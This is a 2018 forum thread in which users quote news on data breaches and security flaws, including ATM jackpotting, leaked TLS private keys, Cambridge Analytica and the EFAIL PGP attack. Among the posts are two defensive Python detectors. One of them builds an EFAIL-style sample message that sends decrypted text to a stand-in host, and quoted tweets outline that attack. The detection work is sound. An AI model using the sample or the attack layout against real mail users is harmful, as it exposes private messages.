The Data Breach Thread

Re: The Data Breach Thread

Post by Max Peck »

Windows Meltdown patches halted for some AMD systems after PCs refuse to boot
AMD processors aren’t affected by the devastating Meltdown CPU flaw, but the emergency fix for Meltdown and Spectre can apparently bring certain AMD CPUs to their knees. Microsoft has stopped offering the Windows security patch to some AMD systems after reports of PCs not booting.

“After investigating, Microsoft has determined that some AMD chipsets do not conform to the documentation previously provided to Microsoft to develop the Windows operating system mitigations to protect against the chipset vulnerabilities known as Spectre and Meltdown,” Microsoft’s security advisory reads. “To prevent AMD customers from getting into an unbootable state, Microsoft will temporarily pause sending the following Windows operating system updates to devices with impacted AMD processors at this time.”
"What? What? What?" -- The 14th Doctor

It's not enough to be a good player... you also have to play well. -- Siegbert Tarrasch

Post by AWS260 »

This is an interesting article about how the Meltdown/Spectre news leaked early.
The biggest hint came on December 18th, when Linus Torvalds merged a late-breaking patch that changed the way the Linux kernel interacts with x86 processors. “This, besides helping fix KASLR leaks (the pending Page Table Isolation (PTI) work), also robustifies the x86 entry code,” Torvalds explained. The most recent kernel release had come just one day earlier. Normally a patch would wait to be bundled into the next release, but for some reason, this one was too important. Why would the famously cranky Torvalds include an out-of-band update so casually, especially one that seemed likely to slow down the kernel?

Post by Moliere »

ATM Makers Issue Warning About Cyber Criminals Targeting Cash Machines
Diebold Nixdorf Inc and NCR Corp, two of the world’s largest ATM makers, have warned that cybercriminals are targeting U.S. cash machines with tools that force them to spit out cash in hacking schemes known as “jackpotting.”

The two ATM makers did not identify any victims or say how much money had been lost. Jackpotting has been rising worldwide in recent years, though it is unclear how much cash has been stolen because victims and police often do not disclose details.

The attacks were reported earlier on Saturday by the security news website Krebs on Security, which said they had begun last year in Mexico.
"The world is suffering more today from the good people who want to mind other men's business than it is from the bad people who are willing to let everybody look after their own individual affairs." - Clarence Darrow

Post by Isgrimnur »

Krebs: First ‘Jackpotting’ Attacks Hit U.S. ATMs
ATM “jackpotting” — a sophisticated crime in which thieves install malicious software and/or hardware at ATMs that forces the machines to spit out huge volumes of cash on demand — has long been a threat for banks in Europe and Asia, yet these attacks somehow have eluded U.S. ATM operators. But all that changed this week after the U.S. Secret Service quietly began warning financial institutions that jackpotting attacks have now been spotted targeting cash machines here in the United States.

To carry out a jackpotting attack, thieves first must gain physical access to the cash machine. From there they can use malware or specialized electronics — often a combination of both — to control the operations of the ATM.
...
On Jan. 26, NCR sent an advisory to its customers saying it had received reports from the Secret Service and other sources about jackpotting attacks against ATMs in the United States.

“While at present these appear focused on non-NCR ATMs, logical attacks are an industry-wide issue,” the NCR alert reads. “This represents the first confirmed cases of losses due to logical attacks in the US. This should be treated as a call to action to take appropriate steps to protect their ATMs against these forms of attack and mitigate any consequences.”
...
The source said the Secret Service is warning that thieves appear to be targeting Opteva 500 and 700 series Diebold ATMs using the Ploutus.D malware in a series of coordinated attacks over the past 10 days, and that there is evidence that further attacks are being planned across the country.
...
“In previous Ploutus.D attacks, the ATM continuously dispensed at a rate of 40 bills every 23 seconds,” the alert continues. Once the dispense cycle starts, the only way to stop it is to press cancel on the keypad. Otherwise, the machine is completely emptied of cash, according to the alert.
It's almost as if people are the problem.
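As an added illustration of the two signals the quoted alert describes, and not code from Krebs, the Secret Service, NCR or Diebold: a small detector run over a constructed dispenser event log. It flags an ATM whose dispenser moved cash with no authorizing host transaction (the dispenser being driven directly, which is how Ploutus-style malware works) and an ATM whose dispense rate over a sliding window looks like the "40 bills every 23 seconds" pattern. The log format, ATM names, 60-second window and 60-bill threshold are all assumptions for the example.

```python
"""Flag dispenser activity that looks like a jackpotting cash-out.

Added illustration; not from the alert or any vendor tooling. Assumes a
hypothetical dispenser event log with one event per line, in time order:
    <ISO timestamp> <atm_id> DISPENSE bills=<n> auth=<host transaction id | none>
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)   # sliding window per ATM (assumed tuning value)
MAX_BILLS_PER_WINDOW = 60        # more than this inside WINDOW is abnormal (assumed)

# Constructed sample log. ATM-0042 dispenses 40 bills every 23 seconds with no
# authorizing host transaction, the pattern the alert describes; ATM-0007 and
# ATM-0013 are ordinary authorized withdrawals.
SAMPLE_LOG = [
    "2018-01-27T02:10:00 ATM-0013 DISPENSE bills=50 auth=T9001",
    "2018-01-27T02:11:30 ATM-0007 DISPENSE bills=5 auth=T9002",
    "2018-01-27T02:13:10 ATM-0007 DISPENSE bills=10 auth=T9003",
    "2018-01-27T02:14:03 ATM-0042 DISPENSE bills=40 auth=none",
    "2018-01-27T02:14:26 ATM-0042 DISPENSE bills=40 auth=none",
    "2018-01-27T02:14:49 ATM-0042 DISPENSE bills=40 auth=none",
    "2018-01-27T02:15:12 ATM-0042 DISPENSE bills=40 auth=none",
    "2018-01-27T02:16:00 ATM-0013 DISPENSE bills=20 auth=T9004",
    "2018-01-27T02:17:45 ATM-0007 DISPENSE bills=8 auth=T9005",
]


def parse_event(line):
    """Split one log line into its fields (format is an assumption, see above)."""
    ts, atm, kind, bills, auth = line.split()
    return {
        "ts": datetime.fromisoformat(ts),
        "atm": atm,
        "kind": kind,
        "bills": int(bills.split("=", 1)[1]),
        "auth": auth.split("=", 1)[1],
    }


def detect_jackpotting(lines):
    """Return {atm_id: sorted list of reasons} for ATMs showing either signal.

    unauthorized_dispense: cash left the dispenser with no host transaction,
        so something other than the ATM application drove the dispenser.
    rate_exceeded: more than MAX_BILLS_PER_WINDOW bills inside WINDOW, the
        continuous-dispense behaviour the alert quotes. This fires even when
        each dispense carries an authorization, so it also catches replayed
        or forged host approvals.
    """
    windows = defaultdict(deque)   # atm -> deque of (ts, bills) inside WINDOW
    flagged = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if ev["kind"] != "DISPENSE":
            continue
        atm = ev["atm"]
        if ev["auth"] == "none":
            flagged[atm].add("unauthorized_dispense")
        q = windows[atm]
        q.append((ev["ts"], ev["bills"]))
        while q and ev["ts"] - q[0][0] > WINDOW:
            q.popleft()   # evict events older than the window
        if sum(b for _, b in q) > MAX_BILLS_PER_WINDOW:
            flagged[atm].add("rate_exceeded")
    return {atm: sorted(reasons) for atm, reasons in flagged.items()}


if __name__ == "__main__":
    for atm, reasons in detect_jackpotting(SAMPLE_LOG).items():
        print(atm, ", ".join(reasons))
```

The unauthorized-dispense rule is the cheap, high-confidence one, since the host already knows which dispenses it approved; the rate rule is the backstop for the case where the malware manages to make each dispense look approved. Against the constructed log only ATM-0042 is flagged, on both counts.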

Post by Isgrimnur »

The attacks were reported earlier on Saturday by the security news website Krebs on Security, which said they had begun last year in Mexico.
Krebs wrote:“Discovered for the first time in Mexico back in 2013, Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message, a technique that had never been seen before,” FireEye’s Daniel Regalado wrote.
...
Reached for comment, Diebold shared an alert it sent to customers Friday warning of potential jackpotting attacks in the United States. Diebold’s alert confirms the attacks so far appear to be targeting front-loaded Opteva cash machines.

“As in Mexico last year, the attack mode involves a series of different steps to overcome security mechanism and the authorization process for setting the communication with the [cash] dispenser,” the Diebold security alert reads. A copy of the entire Diebold alert, complete with advice on how to mitigate these attacks, is available here (PDF).

Post by hitbyambulance »

lol

https://flipboard.com/@flipboard/-a-map ... nsider.com

Strava 'heatmaps' revealing secret military bases around the world

Post by Moliere »

Key iPhone Source Code Gets Posted Online in 'Biggest Leak in History'
Someone just posted what experts say is the source code for a core component of the iPhone’s operating system on GitHub, which could pave the way for hackers and security researchers to find vulnerabilities in iOS and make iPhone jailbreaks easier to achieve.

The GitHub code is labeled “iBoot,” which is the part of iOS that is responsible for ensuring a trusted boot of the operating system. In other words, it’s the program that loads iOS, the very first process that runs when you turn on your iPhone. It loads and verifies the kernel is properly signed by Apple and then executes it—it’s like the iPhone’s BIOS.

The code says it’s for iOS 9, an older version of the operating system, but portions of it are likely to still be used in iOS 11.

Post by Moliere »

Israeli Company Has Likely Found a Way to Break Into Any iPhone
Sometime in the past few months, Cellebrite, an Israeli cyberforensics firm that has big-ticket contracts with the U.S. government, likely found a way to break the security on virtually all iPhone models, Thomas Brewster reports in Forbes. The company has been straight-up advertising to law enforcement agencies that its “advanced unlocking and extraction services” are available for devices running iOS 5 to iOS 11. Furthermore, Brewster cites a source involved in police forensics who says he heard from Cellebrite that it found a way to unlock the iPhone 8. He concluded that Cellebrite must be able to do the same with the iPhone X, since the security features in the two devices are very similar.

In fact, Brewster dug up a warrant from the Department of Homeland Security indicating that its agents were able to break into an iPhone X confiscated in November from a suspect in an arms-trafficking case. The warrant doesn’t detail exactly how it was able to unlock the device, but it notes that the department’s Cellebrite specialist performed a “forensic extraction” in December.

Post by Pyperkub »

Moliere wrote: Wed Feb 07, 2018 11:13 pm Key iPhone Source Code Gets Posted Online in 'Biggest Leak in History'
Someone just posted what experts say is the source code for a core component of the iPhone’s operating system on GitHub, which could pave the way for hackers and security researchers to find vulnerabilities in iOS and make iPhone jailbreaks easier to achieve.

The GitHub code is labeled “iBoot,” which is the part of iOS that is responsible for ensuring a trusted boot of the operating system. In other words, it’s the program that loads iOS, the very first process that runs when you turn on your iPhone. It loads and verifies the kernel is properly signed by Apple and then executes it—it’s like the iPhone’s BIOS.

The code says it’s for iOS 9, an older version of the operating system, but portions of it are likely to still be used in iOS 11.
Biggest leak in *Apple* history...
“This is the biggest leak in history,” Jonathan Levin, the author of a series of books on iOS and Mac OSX internals, told me in an online chat, referring to Apple's history.
Black Lives definitely Matter Lorini!

Also: There are three ways to not tell the truth: lies, damned lies, and statistics.

Post by Isgrimnur »

ars technica
A major dust-up on an Internet discussion forum is touching off troubling questions about the security of some browser-trusted HTTPS certificates when it revealed the CEO of a certificate reseller emailed a partner the sensitive private keys for 23,000 TLS certificates.

The email was sent on Tuesday by the CEO of Trustico, a UK-based reseller of TLS certificates issued by the browser-trusted certificate authorities Comodo and, until recently, Symantec. It was sent to Jeremy Rowley, an executive vice president at DigiCert, a certificate authority that acquired Symantec's certificate issuance business after Symantec was caught flouting binding industry rules, prompting Google to distrust Symantec certificates in its Chrome browser. In communications earlier this month, Trustico notified DigiCert that 50,000 Symantec-issued certificates Trustico had resold should be mass revoked because of security concerns.

When Rowley asked for proof the certificates were compromised, the Trustico CEO emailed the private keys of 23,000 certificates, according to an account posted to a Mozilla security policy forum. The report produced a collective gasp among many security practitioners who said it demonstrated a shockingly cavalier treatment of the digital certificates that form one of the most basic foundations of website security.

Generally speaking, private keys for TLS certificates should never be archived by resellers, and, even in the rare cases where such storage is permissible, they should be tightly safeguarded. A CEO being able to attach the keys for 23,000 certificates to an email raises troubling concerns that those types of best practices weren't followed. (There's no indication the email was encrypted, either, although neither Trustico nor DigiCert provided that detail when responding to questions.) Other critics contend Trustico emailed the keys in an attempt to force customers with Symantec-issued certificates to move to Comodo-issued certificates. Although DigiCert took over Symantec's certificate issuance business, it doesn't count Trustico as a reseller.

In a statement, Trustico officials said the keys were recovered from "cold storage," a term that typically refers to offline storage systems.

"Trustico allows customers to generate a Certificate Signing Request and Private Key during the ordering process," the statement read. "These Private Keys are stored in cold storage, for the purpose of revocation."
...
Update: Several hours after this post went live, Trustico's website went offline after a Web security expert posted a critical vulnerability on Twitter. The flaw, in a trustico.com website feature that allowed customers to confirm certificates were properly installed on their sites, appeared to allow attackers to run malicious code on Trustico servers with unfettered "root" privileges.

Post by LawBeefaroni »

So the former Equifax CIO is up on insider trading charges. He's one of many executives who sold $Millions of shares after the breach was known but before it was public. He's the only one for which the "I didn't know about it when I sold" defense is a technical impossibility. Unlike, you know, the CFO for whom it is merely 99.9% impossible.


The following Monday, he conducted web searches about the impact of Experian Plc’s 2015 data breach on its stock price, the agency found. Hours later, Ying exercised all of his available stock options, resulting in him receiving 6,815 shares of Equifax stock. He then sold the stock for more than $950,000.

The following week, Equifax disclosed the cyberattack. The hack has shaken confidence in the Atlanta-based company, which faces more than 240 class-action lawsuits and more than 60 regulatory or government inquiries.
" Hey OP, listen to my advice alright." -Tha General
"No scientific discovery is named after its original discoverer." -Stigler's Law of Eponymy, discovered by Robert K. Merton

MYT

Post by malchior »

Not a traditional data breach but the waters swirling around Facebook have darkened significantly since the revelations that user data had been collected and used for political targeting by Cambridge Analytica.
Politicians in the US, Europe and the UK are calling on Facebook to explain how data on millions of its users was harvested.

US senators have called on Mark Zuckerberg to testify before Congress about how it will protect users.

The head of the European Parliament said it would investigate to see if the data was misused.

A spokesman for Prime Minister Theresa May said she was "very concerned" about the revelations.

Over the weekend, the Guardian and the New York Times published stories which alleged that Facebook had not done enough to warn millions of users that data firm Cambridge Analytica had collected information about them.

Post by Moliere »

Orbitz says a possible data breach has affected 880,000 credit cards
Travel booking website Orbitz has announced that it discovered a potential data breach that exposed information for thousands of customers, as reported by Engadget. The incident, discovered by the company on March 1st, may have exposed information tied to about 880,000 credit cards.

The consumer data in question is from an older booking platform, where information may have been accessed between October and December 2017. Orbitz partner platform data, such as travel booked via Amex Travel, submitted between January 1st, 2016 and December 22nd, 2017 may have also been compromised. The Expedia-owned company says that names, payment card information, dates of birth, email addresses, physical billing addresses, gender, and phone numbers may have been accessed, but it doesn’t yet have “direct evidence” that any information was taken from the website.

Post by Moliere »

More of a feature than a breach, but still, come on FB!

Facebook has been collecting call history and SMS data from Android devices
Facebook has been collecting call records and SMS data from Android devices for years. Several Twitter users have reported finding months or years of call history data in their downloadable Facebook data file. A number of Facebook users have been spooked by the recent Cambridge Analytica privacy scandal, prompting them to download all the data that Facebook stores on their account. The results have been alarming for some.

Post by Isgrimnur »

Accessing Your Facebook Data
Download Your Info: This includes a lot of the same information available to you in your account and activity log, including your Timeline info, posts you have shared, messages, photos and more. Additionally, it includes information that is not available simply by logging into your account, like the ads you have clicked on, data like the IP addresses that are logged when you log into or out of Facebook, and more. To download your information, go to your Settings and click Download a copy of your Facebook data. Learn more.

Post by Moliere »

Europol arrests suspect in bank heists that stole $1.2 billion using malware
After a four year investigation, Europol announced it has arrested the suspected leader of a crime syndicate that stole $1.2 billion from over 100 banks in more than 40 countries using malware. According to Europol, the suspect was arrested by the Spanish National Police in Alicante, Spain, with support from the FBI, Romanian, Belarusian, and Taiwanese authorities, along with cybersecurity companies.

Beginning in 2013, the crime syndicate used multiple malware campaigns — the first called Anunak, followed by more complex versions known as Carbanak and Cobalt — to access bank employees’ computers using phishing scams, and then take over bank systems and access the servers that controlled ATMs.

The group used that access to remotely dispense money from ATMs for their associates to grab, inflate account balances, then take the money out at ATMs, and transfer money from the infected banks into accounts they controlled. Europol says the group would then use prepaid cards linked to cryptocurrency wallets to launder the money and buy luxury cars and houses.

Post by Pyperkub »

Saks Fifth Avenue:
On March 28, 2018, a notorious hacking JokerStash syndicate, also known as Fin7 announced the latest breach of yet another major corporation, with more than five million stolen payment cards offered for sale on the dark web. Several large financial institutions have confirmed that all tested records had been used before at Saks Fifth Avenue, Saks Fifth Avenue OFF 5TH, a discounted offset brand of luxury Saks Fifth Avenue stores, as well as Lord & Taylor stores.

Although at this moment it is close to impossible to ascertain the exact window of compromise, the preliminary analysis suggests that criminals were siphoning the information between May 2017 to present. Based on the analysis of the available data, the entire network of Lord & Taylor and 83 Saks Fifth Avenue locations have been compromised. The majority of stolen credit cards were obtained from New York and New Jersey locations.

Post by Moliere »

Grindr exposed its users’ HIV statuses to two other companies
Grindr users — which include gay, bi, trans, and queer people — can indicate on their profile whether they are HIV positive or negative, when is the last time they got tested, and whether they’re taking HIV treatment or the HIV-preventing pill PrEP. But the app has not been keeping this info private: Grindr has been sharing people’s HIV statuses and test dates with two companies that help optimize the app, called Apptimize and Localytics, BuzzFeed reports. Because the HIV info is shared along with GPS data, phone IDs, and email addresses, it makes it possible to link specific Grindr users with their health condition.

What’s more, the app has been sharing users’ info — like GPS location, sexuality, relationship status, and phone ID — with advertising companies, according to SINTEF. In some cases, this data was not protected by encryption.

Grindr chief technology officer Scott Chen told BuzzFeed that it’s “standard practices” for mobile apps to work with companies like Apptimize and Localytics, and that the data was shared “under strict contractual terms that provide for the highest level of confidentiality, data security, and user privacy.” He added that Grindr doesn’t sell its user info to third parties. Still, security experts and LGBT advocates told BuzzFeed the app should have been more clear on how it handles the data, especially since it affects an already-vulnerable community that’s often victim of harassment.

Post by Pyperkub »

Moliere wrote: Mon Apr 02, 2018 6:24 pm Grindr exposed its users’ HIV statuses to two other companies
Grindr users — which include gay, bi, trans, and queer people — can indicate on their profile whether they are HIV positive or negative, when is the last time they got tested, and whether they’re taking HIV treatment or the HIV-preventing pill PrEP. But the app has not been keeping this info private: Grindr has been sharing people’s HIV statuses and test dates with two companies that help optimize the app, called Apptimize and Localytics, BuzzFeed reports. Because the HIV info is shared along with GPS data, phone IDs, and email addresses, it makes it possible to link specific Grindr users with their health condition.

What’s more, the app has been sharing users’ info — like GPS location, sexuality, relationship status, and phone ID — with advertising companies, according to SINTEF. In some cases, this data was not protected by encryption.

Grindr chief technology officer Scott Chen told BuzzFeed that it’s “standard practices” for mobile apps to work with companies like Apptimize and Localytics, and that the data was shared “under strict contractual terms that provide for the highest level of confidentiality, data security, and user privacy.” He added that Grindr doesn’t sell its user info to third parties. Still, security experts and LGBT advocates told BuzzFeed the app should have been more clear on how it handles the data, especially since it affects an already-vulnerable community that’s often victim of harassment.
A bit more info:
The disclosure of HIV status also raises questions about the app’s privacy policy, which states: “You may also have the option to provide information concerning health characteristics, such as your HIV status or Last Tested Date. Remember that if you choose to include information in your profile, and make your profile public, that information will also become public.”

But the average person may not know or understand what they’ve agreed to in the fine print. Some experts argue that Grindr should be more specific in its user agreements about how it’s using their data.
Data Privacy policies need to be far, far more clear. I expect this allows them to get around HIPAA, but still...

Post by Pyperkub »

Panerabread.com
Panerabread.com, the Web site for the American chain of bakery-cafe fast casual restaurants by the same name, leaked millions of customer records — including names, email and physical addresses, birthdays and the last four digits of the customer’s credit card number — for at least eight months before it was yanked offline earlier today,

The data available in plain text from Panera’s site appeared to include records for any customer who has signed up for an account to order food online via panerabread.com.
Looks like only the online orders at least. Not quite a data breach, as it was just published for anyone apparently, but at least a breach of trust.

Oh, and it was indexable and crawlable, at least until it was fixed today:
Fast forward to early this afternoon — exactly eight months to the day after Houlihan first reported the problem — and data shared by Houlihan indicated the site was still leaking customer records in plain text. Worse still, the records could be indexed and crawled by automated tools with very little effort.

For example, some of the customer records include unique identifiers that increment by one for each new record, making it potentially simple for someone to scrape all available customer accounts. The format of the database also lets anyone search for customers via a variety of data points, including by phone number.

“Panera Bread uses sequential integers for account IDs, which means that if your goal is to gather as much information as you can instead about someone, you can simply increment through the accounts and collect as much as you’d like, up to and including the entire database,” Houlihan said.

Shortly after KrebsOnSecurity spoke briefly with Panera’s chief information officer John Meister by phone today, the company briefly took the Web site offline. As of this publication, the site is back online but the data referenced above no longer appears to be reachable.

Post by Moliere »

Facebook says Cambridge Analytica data collection affected nearly twice as many users as previously thought
Facebook today revealed that as many as 87 million users, most of them in the US but at least 1 million in the UK, may have had their information improperly obtained and used by the data mining firm Cambridge Analytica. The revelation indicates that nearly twice as many Facebook users may have been directly affected by the ongoing data privacy scandal resulting from the unauthorized sale of the social network’s user data to the third-party company, which was contracted by the Trump campaign to help with election ad targeting. Initial reports from The New York Times and The Guardian put the figure at as many as 50 million users who had data scraped by Cambridge psychology professor Aleksandr Kogan’s survey app via Facebook Login.

Post by Moliere »

Nearly 64,000 New Zealanders affected by Cambridge Analytica, but only 10 people downloaded the quiz
Although 311,127 Australians were affected by the Cambridge Analytica data breach, only 53 of the country’s citizens took the Facebook quiz responsible for improperly obtaining and using personal information, as reported by The Guardian. Similarly, 63,724 people in New Zealand were affected, but only 10 New Zealanders downloaded the quiz.

It’s reasonable to assume many of the people in Australia and New Zealand were impacted via a friend in their own country, but that’s likely far from accounting for everyone. These numbers also demonstrate the ripple effects from users’ friends abroad who granted permissions to the personality quiz app, called “thisisyourdigitallife.”
This is why I periodically purge my FB friends list.

Post by Max Peck »

It's (one example of) why I have never had a Facebook account.

Post by Moliere »

Former Cambridge Analytica employee says Facebook users affected could be ‘much greater than 87 million’
I should emphasise that the Kogan/GSR datasets and questionnaires were not the only Facebook-connected questionnaires and datasets which Cambridge Analytica used. I am aware in a general sense of a wide range of surveys which were done by CA or its partners, usually with a Facebook login – for example, the “sex compass” quiz. I do not know the specifics of these surveys or how the data was acquired or processed. But I believe it is almost certain that the number of Facebook users whose data was compromised through routes similar to that used by Kogan is much greater than 87 million; and that both Cambridge Analytica and other unconnected companies and campaigns were involved in these activities.
"The world is suffering more today from the good people who want to mind other men's business than it is from the bad people who are willing to let everybody look after their own individual affairs." - Clarence Darrow
hitbyambulance
Posts: 10233
Joined: Wed Oct 13, 2004 3:51 am
Location: Map Ref 47.6°N 122.35°W

Re: The Data Breach Thread

Post by hitbyambulance »

https://www.theguardian.com/technology/ ... rivacy-law
Facebook has moved more than 1.5 billion users out of reach of European privacy law, despite a promise from Mark Zuckerberg to apply the “spirit” of the legislation globally.

In a tweak to its terms and conditions, Facebook is shifting the responsibility for all users outside the US, Canada and the EU from its international HQ in Ireland to its main offices in California. It means that those users will now be on a site governed by US law rather than Irish law.

The move is due to come into effect shortly before General Data Protection Regulation (GDPR) comes into force in Europe on 25 May. Facebook is liable under GDPR for fines of up to 4% of its global turnover – around $1.6bn – if it breaks the new data protection rules.
of course:
Facebook also said the change did not carry tax implications. That means users will exist in a state of legal superposition: for tax purposes, Facebook will continue to book their revenue through Facebook’s Irish office, but for privacy protections, they will deal with the company’s headquarters in California.
at least there are fewer people asking me 'why don't yooou haaave a faaaaacebooook accooooount' these days.
Isgrimnur
Posts: 82085
Joined: Sun Oct 15, 2006 12:29 am
Location: Chookity pok

Re: The Data Breach Thread

Post by Isgrimnur »

SunTrust
SunTrust Banks Inc., Georgia’s largest lender, said it’s investigating a former employee that might have stolen personal data on 1.5 million customers.
...
The company will offer free identity-protection services through Experian Plc for all current and new customers “on an ongoing basis,” according to the statement. The theft didn’t include social security numbers or user IDs and passwords, according to SunTrust, which didn’t identify the employee.
...
The company can absorb the costs associated with identity monitoring into its “normal course of business,” Rogers said during the call.

He said the company’s investigation started six to eight weeks ago, when it discovered the former employee attempted to download client information. Late last week, SunTrust discovered that the information might have been exposed externally, and that’s when it decided to disclose the incident to clients, Rogers said.
It's almost as if people are the problem.
Moliere
Posts: 12295
Joined: Sun Sep 03, 2006 10:57 am
Location: Walking through a desert land

Re: The Data Breach Thread

Post by Moliere »

"The world is suffering more today from the good people who want to mind other men's business than it is from the bad people who are willing to let everybody look after their own individual affairs." - Clarence Darrow
Lorini
Posts: 8282
Joined: Wed Oct 13, 2004 8:52 am
Location: Santa Clarita, California

Re: The Data Breach Thread

Post by Lorini »

For those of us who have poor memories many of those are just not usable. If I forget the weird pattern to open my phone I'm fucked and I don't want to be fucked. The pattern I use is only obvious if you know me and I don't hang out with people who would try to steal my phone. The other thing is that I can always lock my phone from my computer so really it's not that big of a deal.
Black Lives Matter
Moliere
Posts: 12295
Joined: Sun Sep 03, 2006 10:57 am
Location: Walking through a desert land

Re: The Data Breach Thread

Post by Moliere »

Twitter urges users to change passwords after computer glitch
Twitter Inc urged its more than 330 million users to change their passwords after a glitch caused some of them to be stored in plain text on its internal computer system.
So change it from Password1 to Password2? :ninja:
"The world is suffering more today from the good people who want to mind other men's business than it is from the bad people who are willing to let everybody look after their own individual affairs." - Clarence Darrow
Moliere
Posts: 12295
Joined: Sun Sep 03, 2006 10:57 am
Location: Walking through a desert land

Re: The Data Breach Thread

Post by Moliere »

"The world is suffering more today from the good people who want to mind other men's business than it is from the bad people who are willing to let everybody look after their own individual affairs." - Clarence Darrow
Isgrimnur
Posts: 82085
Joined: Sun Oct 15, 2006 12:29 am
Location: Chookity pok

Re: The Data Breach Thread

Post by Isgrimnur »

TheMix wrote: Wed Sep 20, 2017 12:28 pm In short, consider putting a freeze on the big 3 as well as the little 2.
Add one more:
But Kerskie’s investigation revealed that the mobile phone merchants weren’t asking any of the four credit bureaus mentioned above. Rather, the mobile providers were making credit queries with the National Consumer Telecommunications and Utilities Exchange (NCTUE), or nctue.com.
...
When I did some more digging on the NCTUE, I discovered…wait for it…Equifax also is the sole contractor that manages the NCTUE database. The entity’s site is also hosted out of Equifax’s servers. Equifax’s current contract to provide this service expires in 2020, according to a press release posted in 2015 by Equifax.
It's almost as if people are the problem.
LawBeefaroni
Forum Moderator
Posts: 55316
Joined: Fri Oct 15, 2004 3:08 pm
Location: Urbs in Horto, outrageous taxes on everything

Re: The Data Breach Thread

Post by LawBeefaroni »

There are 150M users of MyFitnessPal?
" Hey OP, listen to my advice alright." -Tha General
"No scientific discovery is named after its original discoverer." -Stigler's Law of Eponymy, discovered by Robert K. Merton

MYT
Isgrimnur
Posts: 82085
Joined: Sun Oct 15, 2006 12:29 am
Location: Chookity pok

Re: The Data Breach Thread

Post by Isgrimnur »

11M active users per month, plus however many slackers that have registered, yet no longer use it.
It's almost as if people are the problem.
Max Peck
Posts: 13682
Joined: Fri Aug 05, 2005 8:09 pm
Location: Down the Rabbit-Hole

Re: The Data Breach Thread

Post by Max Peck »

Technically, not a data breach, but...

Attention PGP Users: New Vulnerabilities Require You To Take Action Now
A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.

The full details will be published in a paper on Tuesday at 07:00 AM UTC (3:00 AM Eastern, midnight Pacific). In order to reduce the short-term risk, we and the researchers have agreed to warn the wider PGP user community in advance of its full publication.

Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email. Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email.
Scoop: PGP and S/MIME have critical vulnerabilities. We @SZ, NDR, WDR have been in touch with the researchers for months. This is how the two (!) attacks work (1/x) #efail

Certain conditions have to be met.
1.) Attacker needs your ciphertext
2.) HTML has to be enabled. (2/x) #efail

The first attack, called "direct exfiltration":
Attacker creates a multipart email with three body parts. First body part, HTML-tag, opened, second body part, ciphertext added, third body part, html-tag closed. (3/x) #efail

Scarily easy to do, by the way. Disable HTML. (4/x) #efail

Second attack: The attackers precisely modify plaintext (if those blocks are known). Works both for S/MIME and in PGP. (5/x) #efail

Since S/MIME mails usually start with "Content-type: multipart/signed", attackers have enough knowledge to re-write ciphertext and include html-tag, then exfiltrate. (6/x) #efail

PGP is a little different: since PGP compresses plaintext before encrypting, guessing known plaintext bytes is harder. (7/x) #efail

All in all, truly troubling, in my humble (!) opinion. Be advised: If you send an e-mail to five persons, using PGP, 6 people can be attacked. The five persons you've sent the mail to, and yourself. (8/8) #efail
PGP: 'Serious' flaw found in secure email tech
Security expert Mikko Hypponen, at F-Secure, said his understanding was that the vulnerability could in theory be used to decrypt a cache of encrypted emails sent in the past, if an attacker had access to such data.
"What? What? What?" -- The 14th Doctor

It's not enough to be a good player... you also have to play well. -- Siegbert Tarrasch
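A defensive triage check for the "direct exfiltration" MIME layout the tweets above describe, added here as an example (it is not the researchers' or EFF's code): it parses a message with Python's standard email library and flags a text/html part that leaves a remote-loading tag open immediately before a ciphertext part. The two sample messages, the collector.example.invalid host and the placeholder armor block are constructed; the real mitigation remains the one the advisory gives (disable HTML rendering and automatic decryption).

```python
import email
import re
from email import policy

# A remote-loading tag opened in this part but never closed (no '>' before the end).
UNCLOSED_TAG_RE = re.compile(
    r"<(?:img|a|iframe|link|script|style|object|base)\b[^>]*\Z", re.I)
ENCRYPTED_TYPES = {"application/pgp-encrypted", "application/pkcs7-mime",
                   "application/octet-stream"}
PGP_ARMOR = "-----BEGIN PGP MESSAGE-----"

def looks_encrypted(part) -> bool:
    """True if a MIME part carries PGP or S/MIME ciphertext."""
    ctype = part.get_content_type()
    if ctype in ENCRYPTED_TYPES:
        return True
    return ctype.startswith("text/") and PGP_ARMOR in part.get_content()

def efail_direct_exfil_suspect(raw: bytes) -> bool:
    """Flag a message whose HTML part leaves a tag open right before ciphertext."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    if not msg.is_multipart():
        return False
    parts = list(msg.iter_parts())
    for html_part, next_part in zip(parts, parts[1:]):
        if html_part.get_content_type() != "text/html":
            continue
        html = html_part.get_content().rstrip()  # transfer encoding already decoded
        if UNCLOSED_TAG_RE.search(html) and looks_encrypted(next_part):
            return True
    return False

def build_mixed(parts) -> bytes:
    """Constructed sample builder: parts is a list of (content_type, body)."""
    out = ["MIME-Version: 1.0", 'Content-Type: multipart/mixed; boundary="b1"', ""]
    for ctype, body in parts:
        out += ["--b1", f"Content-Type: {ctype}", "", body]
    out.append("--b1--")
    return "\n".join(out).encode()

CIPHERTEXT = f"{PGP_ARMOR}\nPLACEHOLDER-NOT-REAL-CIPHERTEXT\n-----END PGP MESSAGE-----"
# Layout the tweets describe (constructed, inert): tag opened, ciphertext, tag closed.
SUSPECT = build_mixed([("text/html", '<img src="https://collector.example.invalid/'),
                       ("text/plain", CIPHERTEXT), ("text/html", '">')])
# Ordinary message: a well-formed HTML note, then the ciphertext as its own part.
BENIGN = build_mixed([("text/html", "<p>Encrypted message attached.</p>"),
                      ("text/plain", CIPHERTEXT)])
```

The check only walks top-level sibling parts; a production filter would also descend into nested multipart containers and apply the same rule inside a decrypted payload, which is where the second attack the tweets describe places the injected tag.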
Pyperkub
Posts: 23583
Joined: Mon Dec 13, 2004 5:07 pm
Location: NC- that's Northern California

Re: The Data Breach Thread

Post by Pyperkub »

Chilis Payment Card info:
What Happened? On May 11, 2018, we learned that some of our Guests’ payment card information was compromised at certain Chili’s restaurants as the result of a data incident. Currently, we believe the data incident was limited to between March – April 2018; however, we continue to assess the scope of the incident.
Black Lives definitely Matter Lorini!

